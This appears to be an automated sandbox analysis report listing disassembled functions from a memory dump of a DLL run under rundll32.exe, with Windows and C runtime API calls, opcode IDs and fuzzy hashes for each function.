                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2E5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 45aec3eed34b1108637822851370a699a6a760e9032c57c6915747af7d4467eb
                                                                                                                                                                                                                                                          • Instruction ID: a0d095d940df9d4e950a5f75349bee08d61d88b10ae0e5b0bcd087542ff4b4a8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45aec3eed34b1108637822851370a699a6a760e9032c57c6915747af7d4467eb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D21A97A904118AFCF41DFA4C850DED7BB9FF48244B538169EA199B120DB31DA65CF80
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0878aa1b2b6e4713be0f0760b1337bd263f8cd97c05e14e2cf999ea115c2dd4b
                                                                                                                                                                                                                                                          • Instruction ID: ae685c0174bfd2950cdb2dc524a756d7f9a646737ffe83045cf254a01b6ea53b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0878aa1b2b6e4713be0f0760b1337bd263f8cd97c05e14e2cf999ea115c2dd4b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5C109B4E082159FDF11CF9AD880BBDBBB0BF9A318F61816DE515A7381CB349941CB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 6DE4436E: CreateFileW.KERNEL32(00000000,00000000,?,6DE4475E,?,?,00000000,?,6DE4475E,00000000,0000000C), ref: 6DE4438B
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6DE447C9
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 6DE447D0
                                                                                                                                                                                                                                                          • GetFileType.KERNEL32(00000000), ref: 6DE447DC
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6DE447E6
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 6DE447EF
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 6DE4480F
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(6DE3FCD2), ref: 6DE4495C
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6DE4498E
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 6DE44995
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4237864984-0
                                                                                                                                                                                                                                                          • Opcode ID: 52ffa04f023c7060887ade4418f74b73ec9958e2baf6c746242a0de21802f3fb
                                                                                                                                                                                                                                                          • Instruction ID: 2d03bb72fbf572ff1a1c79094dc02d1e8b2983951785bf93707c50d92d684a8c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52ffa04f023c7060887ade4418f74b73ec9958e2baf6c746242a0de21802f3fb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DA13272A081598FCF09DF68E841BAD7BF0AB4F328F25815EE815AB390CF748812C751
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 6DE45818: _free.LIBCMT ref: 6DE4583D
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE4589E
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: HeapFree.KERNEL32(00000000,00000000,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?), ref: 6DE3D6A0
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: GetLastError.KERNEL32(?,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?,?), ref: 6DE3D6B2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE458A9
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE458B4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE45908
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE45913
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE4591E
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE45929
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 2536a4e061a4774c2413857fa71987725cc3c57037fa6d39a53ba6d9bf290c9a
                                                                                                                                                                                                                                                          • Instruction ID: baf96037eac13d19cd2360a1db81b5c30eff35fee0657e86b3a6d5557acc8f2d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2536a4e061a4774c2413857fa71987725cc3c57037fa6d39a53ba6d9bf290c9a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E111A271548B48A6D660A770DC06FEB779CAF48704F938C2CE7AE66050CF65B4208F90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 6DE43593
                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 6DE43772
                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 6DE4378F
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,6DE3F5F6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6DE437D7
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6DE43817
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6DE438C3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4031098158-0
                                                                                                                                                                                                                                                          • Opcode ID: 4c9a1456767b8f1a9af424a558a5075b61f9a48a5c3680b5434ef53964b10e18
                                                                                                                                                                                                                                                          • Instruction ID: 0c2daef5d81effb8130cf842e636622c31e7ec39b1acfa1e498102d46019e25c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c9a1456767b8f1a9af424a558a5075b61f9a48a5c3680b5434ef53964b10e18
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07D1A9B5D002599FCB15CFE8D880AEDFBB5BF49314F24806AE855BB381DB31A946CB50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,6DE38DA8,6DE3700A,6DE37312), ref: 6DE391A7
                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6DE391B5
                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6DE391CE
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,6DE38DA8,6DE3700A,6DE37312), ref: 6DE39220
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                                          • Opcode ID: 5e380b7c209de50635fb5566feea3cfc6107445f7b8bdcfb927112e5c456a683
                                                                                                                                                                                                                                                          • Instruction ID: beeee3ca464836ae6f426a96a93b45ba3c6297a59bd4f9d58c41d3c3ec9754b2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e380b7c209de50635fb5566feea3cfc6107445f7b8bdcfb927112e5c456a683
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0101D47224D6369EEB1955B56C88B7A36F4EB0377C733062DE620A61D0EF528851D140
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AdjustPointer
                                                                                                                                                                                                                                                          • String ID: ym
                                                                                                                                                                                                                                                          • API String ID: 1740715915-2567925931
                                                                                                                                                                                                                                                          • Opcode ID: 76e5482fc66c925455aa1b5ce90f098ca1bcbf84e27a9e621c347c61935eff3b
                                                                                                                                                                                                                                                          • Instruction ID: b96f7f787ae87b698e0b9b9e3e9bedae5aff02ac2117288a903840a2bb2cd1a0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76e5482fc66c925455aa1b5ce90f098ca1bcbf84e27a9e621c347c61935eff3b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1519FB2A086239FDB1A8E55DC80BBA77A4FF45718F33452DE916962D0DF31E841C790
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6DE4120C
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                          • API String ID: 0-2837366778
                                                                                                                                                                                                                                                          • Opcode ID: c749e2d4ba008c2660fa034f9073fb8ea25776f7cb4a2d28de819aa86a791e03
                                                                                                                                                                                                                                                          • Instruction ID: 0f2e82e49dea864df4d875295f818627a349fc2bdccb5d8702f8b1dc0d03c57b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c749e2d4ba008c2660fa034f9073fb8ea25776f7cb4a2d28de819aa86a791e03
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A21B371608216AF9F105FE5AC8096777BCAB4136C721C618FA28E7240FF31EC6197A4
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE457C7
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: HeapFree.KERNEL32(00000000,00000000,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?), ref: 6DE3D6A0
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: GetLastError.KERNEL32(?,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?,?), ref: 6DE3D6B2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE457D9
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE457EB
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE457FD
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE4580F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 381ed92e3f1534d124e9050bffa1bb327f74dfe3a711358359adfa0a082634e3
                                                                                                                                                                                                                                                          • Instruction ID: 4c6ab16b10501415342094093a920ecc4d1ccb2ada109573dd0611fe0c28dfc9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 381ed92e3f1534d124e9050bffa1bb327f74dfe3a711358359adfa0a082634e3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84F04932408225DBDB90DA59E8C4C7A73F9BB467187B28819F42CE7600CF31F890CEA4
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                                          • String ID: *?
                                                                                                                                                                                                                                                          • API String ID: 269201875-2564092906
                                                                                                                                                                                                                                                          • Opcode ID: be0b59ba3c73918a4b6b6aaecc14d9a85920bed4f98c2dc0d16ea2f4ec30d012
                                                                                                                                                                                                                                                          • Instruction ID: 820e05b3ff5fe130afd44aac70e94c5517b75bf37d74d7d8dc87d43707ebdd3d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be0b59ba3c73918a4b6b6aaecc14d9a85920bed4f98c2dc0d16ea2f4ec30d012
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE617CB5E0421A9FCB14CFA9D8805EDFBF5EF88314B25816AE814F7340DB71AE418B90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6DE38E5F
                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6DE38F13
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                          • String ID: csm$ym
                                                                                                                                                                                                                                                          • API String ID: 3480331319-4111166203
                                                                                                                                                                                                                                                          • Opcode ID: e97a5bfdf0a398549adb7b33e8f400e3f6c969c3605169478636969f6cc65715
                                                                                                                                                                                                                                                          • Instruction ID: 8a3c281821601d0eeeb11ea45d9d104d5452530c8ee51a0dbc291200f708c902
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e97a5bfdf0a398549adb7b33e8f400e3f6c969c3605169478636969f6cc65715
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B41C7349141299BCF04DF69CCC4ABEBBB5BF4531CF228159D914AB351CB32EA41CB91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 6DE398AB
                                                                                                                                                                                                                                                          • CatchIt.LIBVCRUNTIME ref: 6DE39991
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CatchEncodePointer
                                                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                                                          • API String ID: 1435073870-2084237596
                                                                                                                                                                                                                                                          • Opcode ID: d32ef6b4e60858bbd101c5b086ec171ac8ff0adf43bcebf84dc182cd933d817e
                                                                                                                                                                                                                                                          • Instruction ID: 42be1ce98b41d84d42d050a7c4c2d7ac66ee565f5f8038376faa1365163e1fce
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d32ef6b4e60858bbd101c5b086ec171ac8ff0adf43bcebf84dc182cd933d817e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C41597290422AAFCF05CF94CD80AFE7BB5BF48308F264099FA1977211DB35A951DB50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,6DE6947C,00000000,?,?,6DE3C2C2,?,?,6DE3C28A,?,?,?), ref: 6DE3C325
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,6DE69494), ref: 6DE3C338
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,6DE3C2C2,?,?,6DE3C28A,?,?,?), ref: 6DE3C35B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                          • String ID: ym
                                                                                                                                                                                                                                                          • API String ID: 4061214504-2567925931
                                                                                                                                                                                                                                                          • Opcode ID: e639ec9dc02963fb2e5faf2fa4ed08f8fc0737349a26dd32cea1e44a59ea0dd8
                                                                                                                                                                                                                                                          • Instruction ID: 32957503c2ed312e37dd63c262b08937217ca9bbe547b66f44b02af49c5ecee7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e639ec9dc02963fb2e5faf2fa4ed08f8fc0737349a26dd32cea1e44a59ea0dd8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0F08231600129FBDF02AB51CD49BEE7BB4EB04755F2100A4E905B1250CF71CE41DA90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE46DAD
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE46DD6
                                                                                                                                                                                                                                                          • SetEndOfFile.KERNEL32(00000000,6DE44603,00000000,6DE3FCD2,?,?,?,?,?,?,?,6DE44603,6DE3FCD2,00000000), ref: 6DE46E08
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,6DE44603,6DE3FCD2,00000000,?,?,?,?,00000000,?), ref: 6DE46E24
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFileLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1547350101-0
                                                                                                                                                                                                                                                          • Opcode ID: 4657d91ced63c4e8fc096fe7314f6762ff5e9998fa92bf7476a129e2c6ae6172
                                                                                                                                                                                                                                                          • Instruction ID: 746c7ccaf5103844d251ff9d8718369262052cba81f2b4a5b76cedebaae49d0f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4657d91ced63c4e8fc096fe7314f6762ff5e9998fa92bf7476a129e2c6ae6172
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 264117769046059BDB01AFB8EC00BEE37B5AF45368F32811CF624B72A0DF31D95587A1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 6DE410C1: _free.LIBCMT ref: 6DE410CF
                                                                                                                                                                                                                                                            • Part of subcall function 6DE41C1A: WideCharToMultiByte.KERNEL32(?,00000000,6DE3F667,00000000,00000001,6DE3F5F6,6DE43EDB,?,6DE3F667,?,00000000,?,6DE43C4A,0000FDE9,00000000,?), ref: 6DE41CBC
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6DE40B07
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 6DE40B0E
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6DE40B4D
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 6DE40B54
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 167067550-0
                                                                                                                                                                                                                                                          • Opcode ID: b838fe768b3ecd280991d33289ed03799240ae7edb2787f24f33488fc80e67da
                                                                                                                                                                                                                                                          • Instruction ID: 7d4071cadcf108e82e736539f580357e30e858956c8ca9733bc3adff1ab9b2a0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b838fe768b3ecd280991d33289ed03799240ae7edb2787f24f33488fc80e67da
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9721D871608616AFDB109FA79C80C6777BCEF5136C721C528F91897240DF31EC518B94
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2c34c66aeaf2d24ee903d642749afd8c60a49eb4fd9f96f7b5e5e4e13af7c5f2
                                                                                                                                                                                                                                                          • Instruction ID: 82098994c70efd8d4e3c45957d7e2b321e27556d5e411c82d170fecc0eb5ad0b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c34c66aeaf2d24ee903d642749afd8c60a49eb4fd9f96f7b5e5e4e13af7c5f2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F21D879E45222A7DF129AA5AC40B2F36A8AF03768F328115ED15B7380EF30E911C5E0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,6DE43991,?,00000001,6DE3F667,?,6DE43E50,00000001,?,?,?,6DE3F5F6,?,?), ref: 6DE3D3B1
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D40E
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D444
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,6DE700D0,000000FF,?,6DE43E50,00000001,?,?,?,6DE3F5F6,?,?,?,6DE6EBD8,0000002C,6DE3F667), ref: 6DE3D44F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2283115069-0
                                                                                                                                                                                                                                                          • Opcode ID: cb6f304b0a69db4b061f998ed8ef1c9ece2691c99c9d16a42553bcef70d7d7fd
                                                                                                                                                                                                                                                          • Instruction ID: 602da665b5cb33fdff0c97ad21f4106d8734112eae75152d3f2ebf50e4edafbf
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb6f304b0a69db4b061f998ed8ef1c9ece2691c99c9d16a42553bcef70d7d7fd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20118D362082216BD75656759C84B7A21F9B7D267CF37452CF628E32D0DF618C11C521
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000001,00000001,6DE70096,6DE3D67C,6DE3D707,6DE70094,?,6DE37E19,6DE70096,6DE70094,?,?,?,6DE34DCE,00000001,6DE70098), ref: 6DE3D508
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D565
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D59B
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,6DE700D0,000000FF,?,6DE37E19,6DE70096,6DE70094,?,?,?,6DE34DCE,00000001,6DE70098), ref: 6DE3D5A6
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2283115069-0
                                                                                                                                                                                                                                                          • Opcode ID: 6bc40a457ab0535bb8136c511d8943d4fa0dcc009b7202138253765c87ec0974
                                                                                                                                                                                                                                                          • Instruction ID: e8e244a7054557dc06ddc2fe4966b906fe24a1379df690bf524f210871c4670e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6bc40a457ab0535bb8136c511d8943d4fa0dcc009b7202138253765c87ec0974
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2311A33A248321BAEB5256659C80F3A31B9A7D227CF334628F628E22C0DF628815C121
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,6DE3A304,?,?,6DE7C7C4,00000000,?,6DE3A42F,00000004,6DE693A4,6DE6939C,6DE693A4,00000000), ref: 6DE3A2D3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.484857647.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                                                          • Opcode ID: c552bafe0f76c1889c5f5f5332c078ca48f1cb7a43a23984940150e32eb1eeee
                                                                                                                                                                                                                                                          • Instruction ID: 090efdac8c241f77240bde0cc2ff51d720eb31034e8731b7659798bb544ac53c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c552bafe0f76c1889c5f5f5332c078ca48f1cb7a43a23984940150e32eb1eeee
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F411A336AC5632ABDF129A688C40F7A33F8AB02764F234114FD10B7380DB71E981C6D1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(?,?,6DE3F667,00000000,?,?,6DE46B80,?,00000001,?,00000001,?,6DE43920,00000000,?,00000001), ref: 6DE47C03
